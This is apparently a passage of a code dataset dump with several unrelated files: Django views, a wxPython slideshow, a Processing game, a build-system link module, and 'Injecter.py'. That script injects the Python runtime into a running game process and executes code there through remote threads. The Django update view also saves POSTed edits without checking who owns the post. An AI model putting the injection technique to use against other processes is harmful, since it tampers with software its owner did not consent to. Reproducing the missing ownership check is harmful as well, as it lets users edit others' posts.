{'sookplace':sookplace})\n\n#게시물 등록 (C)\n@login_required\ndef sookplace_register(request):\n if request.method == 'POST':\n form = SookplaceForm(request.POST, request.FILES)\n if form.is_valid():\n sookplace = form.save(commit=False)\n sookplace.user = request.user ##username 자동 설정\n sookplace.save()\n return redirect('sookplaceapp:sookplace_list')\n else : \n form=SookplaceForm()\n return render(request, 'sookplaceapp/sookplace_register.html', {'form':form})\n\n#게시물 수정(U)\n@login_required\ndef sookplace_update(request, sookplace_id):\n sookplace = get_object_or_404(Sookplace, pk=sookplace_id)\n if request.method=='POST':\n form = SookplaceForm(request.POST, instance=sookplace)\n if form.is_valid():\n sookplace = form.save(commit=False)\n sookplace.user = request.user ##username 자동 설정\n sookplace.save()\n return redirect('sookplaceapp:sookplace_detail', sookplace_id=sookplace.pk) \n else:\n if sookplace.user == User.objects.get(username=request.user.get_username()) : ##자신의 글일때만 수정 가능\n form = SookplaceForm(instance=sookplace)\n return render(request, 'sookplaceapp/sookplace_update.html', {'form':form})\n\n else :\n return redirect('sookplaceapp:sookplace_detail', sookplace_id=sookplace.pk) ##자신의 글 아니면 해당글 detail로 redirect\n\n\n#게시물 삭제(D)\n@login_required\ndef sookplace_delete(request, sookplace_id):\n sookplace = get_object_or_404(Sookplace, pk=sookplace_id)\n if sookplace.user == User.objects.get(username=request.user.get_username()) : ##자신의 글일때만 삭제 가능\n sookplace.delete()\n return redirect('sookplaceapp:sookplace_list')\n else:\n return redirect('sookplaceapp:sookplace_detail', sookplace_id=sookplace.pk) ##자신의 글 아니면 해당글 detail로 redirect\n","sub_path":"sookplaceapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"518051867","text":"# -*- coding: utf-8 -*-\nfrom django.utils.safestring import mark_safe\n\n\nPERSON_HELP_TEXTS = {\n 'is_agreed_nominator': mark_safe(\n \"\"\"Before submitting your nomination, please \n click here to read our privacy notice \n and tick this box to confirm that you have read the policy notice and consent to the \n processing of your personal data and sensitive personal data.\"\"\"\n ),\n 'is_agreed': mark_safe(\n \"\"\"Before submitting this form, please\n click here to read our privacy policy\n and tick this box to confirm that you have read the policy notice and consent to the \n processing of your personal data and sensitive personal data.\"\"\"\n )\n}\n","sub_path":"apps/people/help_texts.py","file_name":"help_texts.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"594286009","text":"from FFxivPythonTrigger.memory.res import kernel32, structure\nfrom FFxivPythonTrigger.memory import process, memory\nimport ctypes\nimport locale\nimport sys\nimport os\nfrom json import dumps\nimport _thread\nimport socket\nimport time\n\ntry:\n is_admin = ctypes.windll.shell32.IsUserAnAdmin()\nexcept:\n is_admin = False\nif not is_admin:\n ctypes.windll.shell32.ShellExecuteW(None, \"runas\", sys.executable, sys.argv[0], None, 1)\n exit()\n\nendl = \"\\n\"\n\nname = \"ffxiv_dx11.exe\"\npid = None\nprint(\"start searching for game process...\")\nwhile pid is None:\n for p in process.list_processes():\n if name in p.szExeFile.decode(locale.getpreferredencoding()).lower():\n pid = p.th32ProcessID\n break\n time.sleep(1)\nprint(\"game process pid: %s\" % pid)\ntime.sleep(3)\nhandler = kernel32.OpenProcess(structure.PROCESS.PROCESS_ALL_ACCESS.value, False, pid)\nif not handler:\n input(\"could not open process\" + endl)\n exit()\n\n# find the python library\npython_version = \"python{0}{1}.dll\".format(sys.version_info.major, sys.version_info.minor)\npython_lib = process.module_from_name(python_version).filename\n\n# Find or inject python module\npython_module = process.module_from_name(python_version, handler)\nif python_module:\n python_lib_h = python_module.lpBaseOfDll\nelse:\n python_lib_h = process.inject_dll(bytes(python_lib, 'ascii'), handler)\n if not python_lib_h:\n print(\"inject failed\" + endl)\n exit()\n\nlocal_handle = kernel32.GetModuleHandleW(python_version)\n\ndif = python_lib_h - local_handle\nfuncs = {k: dif + kernel32.GetProcAddress(local_handle, k) for k in [b'Py_InitializeEx', b'PyRun_SimpleString', b'Py_FinalizeEx']}\n\nparam_addr = memory.allocate_memory(4, handler)\nmemory.write_memory(ctypes.c_int, param_addr, 1, handler)\nprocess.start_thread(funcs[b'Py_InitializeEx'], param_addr, handler)\n\nwdir = os.path.abspath('.')\nlog_path = os.path.join(wdir, 'out.log').replace(\"\\\\\", \"\\\\\\\\\")\nerr_path = os.path.join(wdir, 'err.log').replace(\"\\\\\", \"\\\\\\\\\")\nshellcode = \"\"\"\nimport sys\nfrom os import chdir\nfrom traceback import format_exc\ninit_modules = sys.modules.copy()\ntry:\n sys.path=%s\n chdir(sys.path[0])\n exec(open(\"%s\",encoding='utf-8').read())\nexcept:\n with open(\"%s\", \"w+\") as f:\n f.write(format_exc())\nfinally:\n for key in sys.modules.keys():\n if key not in init_modules:\n del sys.modules[key]\n\"\"\" % (\n dumps(sys.path),\n 'Entrance.py',\n err_path\n)\n\nshellcode = shellcode.encode('utf-8')\nshellcode_addr = memory.allocate_memory(len(shellcode), handler)\nwritten = ctypes.c_ulonglong(0)\nmemory.write_bytes(shellcode_addr, shellcode, handler=handler)\n_thread.start_new_thread(process.start_thread, (funcs[b'PyRun_SimpleString'], shellcode_addr,), {'handler': handler})\n\nprint(\"waiting for initialization...\")\nHOST, PORT = \"127.0.0.1\", 3520\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nwhile True:\n try:\n sock.connect((HOST, PORT))\n break\n except:\n time.sleep(1)\nprint(\"connect!\")\nwhile True:\n try:\n size = int.from_bytes(sock.recv(4), 'little', signed=True)\n if size < 0:\n print('end')\n sock.close()\n time.sleep(2)\n break\n else:\n print(sock.recv(size).decode('utf-8'))\n except:\n break\nprocess.start_thread(funcs[b'Py_FinalizeEx'], handler=handler)\n","sub_path":"Injecter.py","file_name":"Injecter.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"248383405","text":"#!/usr/bin/env python\n\"\"\"\nSlideshow\n\nCopyright (c) 2010 Liam Cooke\n\nPermission is hereby granted, free of charge, to any person\nobtaining a copy of this software and associated documentation\nfiles (the \"Software\"), to deal in the Software without\nrestriction, including without limitation the rights to use,\ncopy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the\nSoftware is furnished to do so, subject to the following\nconditions:\n\nThe above copyright notice and this permission notice shall be\nincluded in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\nEXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES\nOF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\nNONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\nHOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\nOTHER DEALINGS IN THE SOFTWARE.\n\n\"\"\"\nimport itertools\nimport optparse\nimport os\nimport random\nimport sys\nfrom itertools import cycle\n\nimport wx\n\n\nKEY_ESC = 27\nEXTS = ('.jpg', '.jpeg', '.gif', '.png')\n\n\ndef get_images(imagedir='.'):\n images = []\n for root, dirs, files in os.walk(imagedir):\n for img in files:\n if os.path.splitext(img)[-1].lower() not in EXTS:\n continue\n images.append(os.path.join(root, img))\n return images\n\ndef fit_image(image, area):\n if not image or not area or not area.x or not area.y:\n return\n x, y = image.GetWidth(), image.GetHeight()\n ratio = float(x) / float(y)\n x = area.x\n y = int(area.x / ratio)\n if y > area.y:\n y = area.y\n x = int(area.y * ratio)\n image.Rescale(x, y, wx.IMAGE_QUALITY_HIGH)\n pos = (area.x - image.GetWidth())/2, (area.y - image.GetHeight())/2\n image.Resize((area.x, area.y), pos, 1, 1, 1)\n\nclass SlideshowPanel(wx.Panel):\n def __init__(self, parent, images, delay):\n wx.Panel.__init__(self, parent=parent)\n self.frame = parent\n self.SetBackgroundColour('black')\n\n self.images = cycle(images)\n self.image = None\n\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.OnEraseBackground)\n self.Bind(wx.EVT_MOTION, self.OnMouse)\n self.Bind(wx.EVT_KEY_UP, self.OnKeyUp)\n\n self.timer = wx.PyTimer(self.Notify)\n self.timer.Start(delay)\n self.Notify()\n\n def OnEraseBackground(self, event=None):\n dc = event and event.GetDC()\n if not dc:\n dc = wx.ClientDC(self)\n rect = self.GetUpdateRegion().GetBox()\n dc.SetClippingRect(rect)\n dc.Clear()\n img = wx.Image(self.image, wx.BITMAP_TYPE_ANY)\n fit_image(img, dc.GetSize())\n dc.DrawBitmap(img.ConvertToBitmap(), 0, 0)\n\n def Notify(self):\n self.image = self.images.next()\n self.OnEraseBackground()\n\n def OnMouse(self, event):\n if not event.Dragging():\n self._dragpos = None\n return\n self.CaptureMouse()\n if not self._dragpos:\n self._dragpos = event.GetPosition()\n else:\n pos = event.GetPosition()\n displacement = self._dragpos - pos\n self.frame.SetPosition(self.frame.GetPosition() - displacement)\n\n def OnKeyUp(self, event):\n if event.GetKeyCode() in (KEY_ESC, ord('Q')):\n self.frame.Close(force=True)\n else:\n event.Skip()\n\nclass SlideshowFrame(wx.Frame):\n def __init__(self, images, delay, size, opacity):\n wx.Frame.__init__(self, None, size=size or (320, 240), style=wx.NO_BORDER)\n self.panel = SlideshowPanel(self, images, delay)\n self.Center()\n if not size:\n self.panel.SetCursor(wx.StockCursor(wx.CURSOR_BLANK))\n self.SetTransparent(int(255 * opacity))\n\nclass SlideshowApp(wx.App):\n def __init__(self, images, delay, size, opacity, redirect=False, filename=None):\n wx.App.__init__(self, redirect, filename)\n dlg = SlideshowFrame(images, delay, size, opacity)\n if not size:\n dlg.ShowFullScreen(True)\n dlg.Show()\n\ndef main():\n parser = optparse.OptionParser()\n parser.add_option('-i', '--images', metavar='DIR', default='.',\n help='where to look for images (default: .)')\n parser.add_option('-d', '--delay', metavar='SECONDS', type='float', default=3.0,\n help='delay between images (default: 3)')\n parser.add_option('-r', '--random', action='store_true', default=False,\n help='show images in random order')\n parser.add_option('-w', '--window', metavar='WIDTH', type='int', default=0,\n help='window width (leave at 0 for fullscreen)')\n parser.add_option('-o', '--opacity', type='float', default=1.0,\n help='window opacity (default: 1.0)')\n opts, args = parser.parse_args()\n\n imagedir = os.path.realpath(opts.images)\n images = get_images(imagedir)\n if not images:\n parser.error('no images found in %s' % imagedir)\n\n if opts.random:\n random.shuffle(images)\n\n size, width = None, opts.window\n if width:\n if width == 1:\n width = 640\n elif width < 80:\n parser.error('minimum width of 80 pixels expected')\n size = (width, int(width * 0.75))\n\n if opts.opacity < 0 or opts.opacity > 1:\n parser.error('opacity must be between 0.0 and 1.0')\n\n app = SlideshowApp(images, int(opts.delay*1000), size, opts.opacity)\n app.MainLoop()\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"grab-bag/slideshow.py","file_name":"slideshow.py","file_ext":"py","file_size_in_byte":5720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"596964156","text":"s = 0 \nclass gameObject():\n \n def __init__(self, c, xpos, ypos, velocity, lives):\n self.c = c\n self.xpos = xpos\n self.ypos = ypos\n self.vel = velocity\n self.lives = lives\n \n \nclass Basket(gameObject):\n \n # drawing the basket\n def display(self):\n \n stroke(self.c)\n fill(self.c)\n rect(self.xpos , height - 10, 80, 10)\n rect(self.xpos , height - 20, 10, 15)\n rect( self.xpos + 70 , height - 20, 10, 15)\n \n \n def move(self):\n \n if keyPressed:\n if keyCode == RIGHT:\n self.xpos = (self.xpos + 10) % width\n \n if keyCode == LEFT:\n self.xpos = (self.xpos -10) % width\n \n def intersect(self):\n return self.xpos\n \n def life(self):\n \n if self.lives > 1:\n self.lives = self.lives - 1\n return False\n \n else:\n return True\n #if true the game will end \n \n\nclass Ball(gameObject):\n \n def display(self):\n fill (self.c)\n noStroke()\n ellipse (self.xpos,self.ypos,20,20)\n \n \n def fall (self):\n \n if s+1 % 2 == 0:\n self.vel += 0.5\n \n if height - 10 <= self.ypos <= height:\n self.ypos = random(-500,-50)\n self.xpos = random (width)\n \n self.ypos = self.ypos + self.vel\n \n def xposition(self):\n return self.xpos\n \n def yposition(self):\n return self.ypos\n\n \nclass Score(): \n def check (self,b,y,x):\n \n if height - 10 <= y <= height :\n if b < x < b + 70:\n global s\n s += 1\n return True\n return False\n return True\n \n \nbasket = Basket(color(0), 0, 100, 5, 3)\nball = Ball(color(255, 0, 0), 100, 100, 3,3) \nballs = []\nscore = Score()\n \ndef setup():\n size(450,400)\n frameRate(30)\n for i in range (0,3):\n balls.append(ball)\n \ndef draw():\n background(255)\n for i in range(0,len(balls)):\n balls[i].fall()\n balls[i].display()\n\n if score.check(basket.intersect(),ball.yposition(),ball.xposition()) :\n background(255)\n fill(0, 102, 153)\n \n text('score:', 10, 30)\n text(s, 10, 50)\n \n text('lives left:', 80, 30)\n text(basket.lives, 80, 50)\n \n for i in range(0,len(balls)):\n balls[i].fall()\n balls[i].display()\n \n basket.display()\n basket.move()\n\n else:\n \n if basket.life():\n background(0)\n fill(255)\n textSize(32)\n textAlign(CENTER, BOTTOM)\n text(\"Game over\", 0.5*width, 0.5*height) \n\n \n else:\n ball.display()\n ball.fall()\n basket.display()\n basket.move()\n","sub_path":"catchthefruit3.py","file_name":"catchthefruit3.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"479166906","text":"import os.path\nimport re\nimport warnings\nfrom collections import defaultdict\nfrom itertools import chain\nfrom six import string_types\nfrom six.moves import reduce, filter as ifilter\n\nfrom . import builtin\nfrom .compile import Compile, ObjectFiles\nfrom .file_types import local_file\nfrom ..backends.make import writer as make\nfrom ..backends.ninja import writer as ninja\nfrom ..build_inputs import build_input, Edge\nfrom ..file_types import *\nfrom ..iterutils import (first, iterate, listify, merge_dicts, merge_into_dict,\n slice_dict, uniques)\nfrom ..path import Path, Root\nfrom ..shell import posix as pshell\n\nbuild_input('link_options')(lambda build_inputs, env: {\n 'dynamic': defaultdict(list), 'static': defaultdict(list)\n})\n\n_modes = {\n 'shared_library': 'EXPORTS',\n 'static_library': 'STATIC',\n}\n\n\ndef library_macro(name, mode):\n if mode not in _modes:\n return []\n\n # Since the name always begins with \"lib\", this always produces a valid\n # macro name.\n return ['{name}_{suffix}'.format(\n name=re.sub(r'\\W', '_', name.upper()), suffix=_modes[mode]\n )]\n\n\nclass Link(Edge):\n msbuild_output = True\n\n def __init__(self, builtins, build, env, name, files=None, includes=None,\n include=None, pch=None, libs=None, packages=None,\n compile_options=None, link_options=None, entry_point=None,\n lang=None, extra_deps=None):\n self.name = self.__name(name)\n\n self.user_libs = [\n builtins['library'](i, kind=self._preferred_lib, lang=lang)\n for i in iterate(libs)\n ]\n forward_opts = self.__get_forward_opts(self.user_libs)\n self.libs = self.user_libs + forward_opts.get('libs', [])\n\n self.user_packages = [builtins['package'](i)\n for i in iterate(packages)]\n self.packages = self.user_packages + forward_opts.get('packages', [])\n\n # XXX: Remove `include` after 0.3 is released.\n self.user_files = builtins['object_files'](\n files, includes=includes, include=include, pch=pch,\n libs=self.user_libs, packages=self.user_packages,\n options=compile_options, lang=lang\n )\n self.files = sum(\n (getattr(i, 'extra_objects', []) for i in self.user_files),\n self.user_files\n )\n\n if ( len(self.files) == 0 and\n not any(isinstance(i, WholeArchive) for i in self.user_libs) ):\n raise ValueError('need at least one source file')\n\n self.user_options = pshell.listify(link_options)\n self.forwarded_options = forward_opts.get('options', [])\n\n if entry_point:\n self.entry_point = entry_point\n\n formats = uniques(i.format for i in chain(self.files, self.libs,\n self.packages))\n if len(formats) > 1:\n raise ValueError('cannot link multiple object formats')\n\n self.langs = uniques(chain(\n (i.lang for i in self.files if i.lang is not None),\n (j for i in self.libs for j in iterate(i.lang))\n ))\n if not self.langs:\n raise ValueError('unable to determine language')\n\n self.linker = self.__find_linker(env, formats[0], self.langs)\n\n # To handle the different import/export rules for libraries, we need to\n # provide some LIBFOO_EXPORTS/LIBFOO_STATIC macros so the build knows\n # how to annotate public API functions in the headers. XXX: One day, we\n # could pass these as \"semantic options\" (i.e. options that are\n # specified like define('FOO') instead of '-DFOO'). Then the linkers\n # could generate those options in a more generic way.\n defines = []\n if self.linker.has_link_macros:\n defines = library_macro(self.name, self.mode)\n defines = forward_opts.get('defines', []) + defines\n\n for i in self.files:\n if isinstance(i.creator, Compile):\n i.creator.add_link_options(self.mode, defines)\n\n if hasattr(self.linker, 'pre_build'):\n self.linker.pre_build(build, self, name)\n\n output = self.linker.output_file(name, self)\n primary = first(output)\n public_output = None\n\n if hasattr(self.linker, 'post_build'):\n public_output = self.linker.post_build(build, self, output)\n\n self._fill_options(env, output)\n\n Edge.__init__(self, build, output, public_output, extra_deps)\n\n if hasattr(self.linker, 'post_install'):\n primary.post_install = self.linker.post_install(output)\n build['defaults'].add(primary)\n\n @classmethod\n def __name(cls, name):\n head, tail = os.path.split(name)\n return os.path.join(head, cls._prefix + tail)\n\n @staticmethod\n def __get_forward_opts(libs):\n result = {}\n\n def accumulate(libs):\n for i in libs:\n if hasattr(i, 'forward_opts'):\n merge_into_dict(result, i.forward_opts)\n accumulate(i.forward_opts.get('libs', []))\n\n accumulate(libs)\n return result\n\n def __find_linker(self, env, format, langs):\n for i in langs:\n linker = env.builder(i).linker(self.mode)\n if linker.can_link(format, langs):\n return linker\n raise ValueError('unable to find linker')\n\n\nclass DynamicLink(Link):\n base_mode = 'dynamic'\n mode = 'executable'\n msbuild_mode = 'Application'\n _preferred_lib = 'shared'\n _prefix = ''\n\n @property\n def options(self):\n return (self._internal_options + self.forwarded_options +\n self.user_options)\n\n def _fill_options(self, env, output):\n if hasattr(self.linker, 'flags'):\n self._internal_options = (\n sum((i.ldflags(self.linker, output)\n for i in self.packages), []) +\n self.linker.flags(self, output)\n )\n else:\n self._internal_options = []\n\n if hasattr(self.linker, 'libs'):\n linkers = (env.builder(i).linker(self.mode) for i in self.langs)\n self.lib_options = (\n sum((i.always_libs(i is self.linker) for i in linkers), []) +\n sum((i.ldlibs(self.linker, output)\n for i in self.packages), []) +\n self.linker.libs(self, output)\n )\n\n first(output).runtime_deps.extend(\n i.runtime_file for i in self.libs if i.runtime_file\n )\n\n\nclass SharedLink(DynamicLink):\n mode = 'shared_library'\n msbuild_mode = 'DynamicLibrary'\n _prefix = 'lib'\n\n extra_kwargs = ('version', 'soversion')\n\n def __init__(self, *args, **kwargs):\n self.version = kwargs.pop('version', None)\n self.soversion = kwargs.pop('soversion', None)\n if (self.version is None) != (self.soversion is None):\n raise ValueError('specify both version and soversion or neither')\n DynamicLink.__init__(self, *args, **kwargs)\n\n\nclass StaticLink(Link):\n base_mode = 'static'\n mode = 'static_library'\n msbuild_mode = 'StaticLibrary'\n _preferred_lib = 'static'\n _prefix = 'lib'\n\n extra_kwargs = ('static_link_options',)\n\n def __init__(self, *args, **kwargs):\n self.static_options = pshell.listify(\n kwargs.pop('static_link_options', None)\n )\n Link.__init__(self, *args, **kwargs)\n\n @property\n def options(self):\n # Only pass the static-link options to the static linker. The other\n # options are forwarded on to the dynamic linker when this library is\n # used.\n return self.static_options\n\n def _fill_options(self, env, output):\n primary = first(output)\n primary.forward_opts = {\n 'options': self.user_options,\n 'libs': self.user_libs,\n 'packages': self.user_packages,\n }\n if self.linker.has_link_macros:\n macro = library_macro(self.name, self.mode)\n primary.forward_opts['defines'] = macro\n\n primary.linktime_deps.extend(self.user_libs)\n\n\n@builtin.globals('builtins', 'build_inputs', 'env')\n@builtin.type(Executable)\ndef executable(builtins, build, env, name, files=None, **kwargs):\n if files is None and 'libs' not in kwargs:\n params = [('format', env.platform.object_format), ('lang', 'c')]\n return local_file(build, Executable, name, params, **kwargs)\n return DynamicLink(builtins, build, env, name, files,\n **kwargs).public_output\n\n\n@builtin.globals('builtins', 'build_inputs', 'env')\n@builtin.type(SharedLibrary, in_type=string_types + (DualUseLibrary,))\ndef shared_library(builtins, build, env, name, files=None, **kwargs):\n if isinstance(name, DualUseLibrary):\n if files is not None or not set(kwargs.keys()) <= {'format', 'lang'}:\n raise TypeError('unexpected arguments')\n return name.shared\n\n if files is None and 'libs' not in kwargs:\n # XXX: What to do for pre-built shared libraries for Windows, which has\n # a separate DLL file?\n params = [('format', env.platform.object_format), ('lang', 'c')]\n return local_file(build, SharedLibrary, name, params, **kwargs)\n return SharedLink(builtins, build, env, name, files,\n **kwargs).public_output\n\n\n@builtin.globals('builtins', 'build_inputs', 'env')\n@builtin.type(StaticLibrary, in_type=string_types + (DualUseLibrary,))\ndef static_library(builtins, build, env, name, files=None, **kwargs):\n if isinstance(name, DualUseLibrary):\n if files is not None or not set(kwargs.keys()) <= {'format', 'lang'}:\n raise TypeError('unexpected arguments')\n return name.static\n\n if files is None and 'libs' not in kwargs:\n params = [('format', env.platform.object_format), ('lang', 'c')]\n return local_file(build, StaticLibrary, name, params, **kwargs)\n return StaticLink(builtins, build, env, name, files,\n **kwargs).public_output\n\n\n@builtin.globals('builtins', 'build_inputs', 'env')\n@builtin.type(Library, in_type=string_types + (DualUseLibrary,))\ndef library(builtins, build, env, name, files=None, **kwargs):\n if env.library_mode.shared and env.library_mode.static:\n kind = 'dual'\n elif env.library_mode.shared:\n kind = 'shared'\n elif env.library_mode.static:\n kind = 'static'\n else:\n raise ValueError('unable to create library: both shared and static ' +\n 'modes disabled')\n\n explicit_kind = 'kind' in kwargs\n kind = kwargs.pop('kind', kind)\n\n if isinstance(name, DualUseLibrary):\n if files is not None or not set(kwargs.keys()) <= {'format', 'lang'}:\n raise TypeError('unexpected arguments')\n return name if kind == 'dual' else getattr(name, kind)\n\n if files is None and 'libs' not in kwargs:\n params = [('format', env.platform.object_format), ('lang', 'c')]\n file_type = StaticLibrary\n\n if explicit_kind:\n if kind == 'shared':\n file_type = SharedLibrary\n # Ignore the lang argument for shared libraries.\n params = params[:1]\n kwargs.pop('lang')\n elif kind == 'dual':\n raise ValueError(\"can't create dual-use libraries from an \" +\n \"existing file\")\n\n # XXX: Try to detect if a string refers to a shared lib?\n return local_file(build, file_type, name, params, **kwargs)\n\n shared_kwargs = slice_dict(kwargs, SharedLink.extra_kwargs)\n static_kwargs = slice_dict(kwargs, StaticLink.extra_kwargs)\n shared_kwargs.update(kwargs)\n static_kwargs.update(kwargs)\n\n if kind == 'dual':\n shared = SharedLink(builtins, build, env, name, files, **shared_kwargs)\n if not shared.linker.builder.can_dual_link:\n warnings.warn(\"dual linking not supported with {}\"\n .format(shared.linker.brand))\n return shared.public_output\n\n static = StaticLink(builtins, build, env, name, shared.files,\n **static_kwargs)\n return DualUseLibrary(shared.public_output, static.public_output)\n elif kind == 'shared':\n return SharedLink(builtins, build, env, name, files,\n **shared_kwargs).public_output\n else: # kind == 'static'\n return StaticLink(builtins, build, env, name, files,\n **static_kwargs).public_output\n\n\n@builtin.globals('builtins')\n@builtin.type(WholeArchive, in_type=string_types + (StaticLibrary,))\ndef whole_archive(builtins, name, *args, **kwargs):\n if isinstance(name, StaticLibrary):\n if len(args) or len(kwargs):\n raise TypeError('unexpected arguments')\n return WholeArchive(name)\n else:\n return WholeArchive(builtins['static_library'](name, *args, **kwargs))\n\n\n@builtin.globals('build_inputs')\ndef global_link_options(build, options, family='native', mode='dynamic'):\n for i in iterate(family):\n build['link_options'][mode][i].extend(pshell.listify(options))\n\n\ndef _get_flags(backend, rule, build_inputs, buildfile):\n variables = {}\n cmd_kwargs = {}\n\n if hasattr(rule.linker, 'flags_var'):\n global_ldflags, ldflags = backend.flags_vars(\n rule.linker.flags_var,\n (rule.linker.global_flags +\n build_inputs['link_options'][rule.base_mode][rule.linker.family]),\n buildfile\n )\n cmd_kwargs = {'flags': ldflags}\n if rule.options:\n variables[ldflags] = [global_ldflags] + rule.options\n\n if hasattr(rule.linker, 'libs_var'):\n global_ldlibs, ldlibs = backend.flags_vars(\n rule.linker.libs_var, rule.linker.global_libs, buildfile\n )\n cmd_kwargs['libs'] = ldlibs\n if rule.lib_options:\n variables[ldlibs] = [global_ldlibs] + rule.lib_options\n\n if hasattr(rule, 'manifest'):\n var = backend.var('manifest')\n cmd_kwargs['manifest'] = var\n variables[var] = rule.manifest\n\n return variables, cmd_kwargs\n\n\n@make.rule_handler(StaticLink, DynamicLink, SharedLink)\ndef make_link(rule, build_inputs, buildfile, env):\n linker = rule.linker\n variables, cmd_kwargs = _get_flags(make, rule, build_inputs, buildfile)\n\n output_params = []\n if len(rule.output) == 1:\n output_vars = make.qvar('@')\n else:\n output_vars = []\n for i in range(linker.num_outputs):\n v = make.var(str(i + 2))\n output_vars.append(v)\n output_params.append(rule.output[i])\n\n recipename = make.var('RULE_{}'.format(linker.rule_name.upper()))\n if not buildfile.has_variable(recipename):\n buildfile.define(recipename, [linker(\n make.var('1'), output_vars, **cmd_kwargs\n )])\n\n files = rule.files\n if hasattr(rule.linker, 'transform_input'):\n files = rule.linker.transform_input(files)\n\n manifest = listify(getattr(rule, 'manifest', None))\n dirs = uniques(i.path.parent() for i in rule.output)\n make.multitarget_rule(\n buildfile,\n targets=rule.output,\n deps=rule.files + rule.libs + manifest + rule.extra_deps,\n order_only=[i.append(make.dir_sentinel) for i in dirs if i],\n recipe=make.Call(recipename, files, *output_params),\n variables=variables\n )\n\n\n@ninja.rule_handler(StaticLink, DynamicLink, SharedLink)\ndef ninja_link(rule, build_inputs, buildfile, env):\n linker = rule.linker\n variables, cmd_kwargs = _get_flags(ninja, rule, build_inputs, buildfile)\n\n if len(rule.output) == 1:\n output_vars = ninja.var('out')\n elif linker.num_outputs == 1:\n output_vars = ninja.var('output')\n variables[output_vars] = rule.output[0]\n else:\n output_vars = []\n for i in range(linker.num_outputs):\n v = ninja.var('output{}'.format(i + 1))\n output_vars.append(v)\n variables[v] = rule.output[i]\n\n if hasattr(rule.linker, 'transform_input'):\n input_var = ninja.var('input')\n variables[input_var] = rule.linker.transform_input(rule.files)\n else:\n input_var = ninja.var('in')\n\n if not buildfile.has_rule(linker.rule_name):\n buildfile.rule(name=linker.rule_name, command=linker(\n input_var, output_vars, **cmd_kwargs\n ))\n\n manifest = listify(getattr(rule, 'manifest', None))\n buildfile.build(\n output=rule.output,\n rule=linker.rule_name,\n inputs=rule.files,\n implicit=rule.libs + manifest + rule.extra_deps,\n variables=variables\n )\n\n\ntry:\n from .compile import CompileHeader\n from ..backends.msbuild import writer as msbuild\n\n def _reduce_compile_options(files, global_cflags):\n creators = [i.creator for i in files if i.creator]\n compilers = uniques(i.linker for i in creators)\n\n return reduce(merge_dicts, chain(\n (i.parse_flags(msbuild.textify_each(\n i.global_flags + global_cflags[i.lang]\n )) for i in compilers),\n (i.linker.parse_flags(msbuild.textify_each(\n i.options\n )) for i in creators)\n ))\n\n def _parse_common_cflags(compiler, global_cflags):\n return compiler.parse_flags(msbuild.textify_each(\n compiler.global_flags + global_cflags[compiler.lang]\n ))\n\n def _parse_file_cflags(file, per_compiler_cflags):\n cflags = file.creator.compiler.parse_flags(\n msbuild.textify_each(file.creator.options)\n )\n if not per_compiler_cflags:\n return cflags\n key = file.creator.compiler.command_var\n return merge_dicts(per_compiler_cflags[key], cflags)\n\n @msbuild.rule_handler(DynamicLink, SharedLink, StaticLink)\n def msbuild_link(rule, build_inputs, solution, env):\n if ( any(i not in ['c', 'c++'] for i in rule.langs) or\n rule.linker.flavor != 'msvc' ):\n raise ValueError('msbuild backend currently only supports c/c++ ' +\n 'with msvc')\n\n output = rule.output[0]\n\n # Parse compilation flags; if there's only one set of them (i.e. the\n # command_var is the same for every compiler), we can apply these to\n # all the files at once. Otherwise, we need to apply them to each file\n # individually so they all get the correct options.\n obj_creators = [i.creator for i in rule.files]\n compilers = uniques(i.compiler for i in obj_creators)\n\n per_compiler_cflags = {}\n for c in compilers:\n key = c.command_var\n if key not in per_compiler_cflags:\n per_compiler_cflags[key] = c.parse_flags(msbuild.textify_each(\n c.global_flags + build_inputs['compile_options'][c.lang]\n ))\n\n if len(per_compiler_cflags) == 1:\n common_cflags = per_compiler_cflags.popitem()[1]\n else:\n common_cflags = None\n\n # Parse linking flags.\n ldflags = rule.linker.parse_flags(msbuild.textify_each(\n (rule.linker.global_flags +\n build_inputs['link_options'][rule.base_mode][rule.linker.family] +\n rule.options)\n ))\n ldflags['libs'] = (\n getattr(rule.linker, 'global_libs', []) +\n getattr(rule, 'lib_options', [])\n )\n if hasattr(output, 'import_lib'):\n ldflags['import_lib'] = output.import_lib\n\n deps = chain(\n (i.creator.file for i in rule.files),\n chain.from_iterable(i.creator.header_files for i in rule.files),\n chain.from_iterable(i.creator.extra_deps for i in rule.files),\n ifilter(None, (getattr(i.creator, 'pch_source', None)\n for i in rule.files)),\n rule.libs, rule.extra_deps\n )\n\n def get_source(file):\n # Get the source file for this compilation rule; it's either a\n # regular source file or a PCH source file.\n if isinstance(file.creator, CompileHeader):\n return file.creator.pch_source\n return file.creator.file\n\n # Create the project file.\n project = msbuild.VcxProject(\n env, name=rule.name,\n mode=rule.msbuild_mode,\n output_file=output,\n files=[{\n 'name': get_source(i),\n 'options': _parse_file_cflags(i, per_compiler_cflags),\n } for i in rule.files],\n compile_options=common_cflags,\n link_options=ldflags,\n dependencies=solution.dependencies(deps),\n )\n solution[output] = project\nexcept ImportError:\n 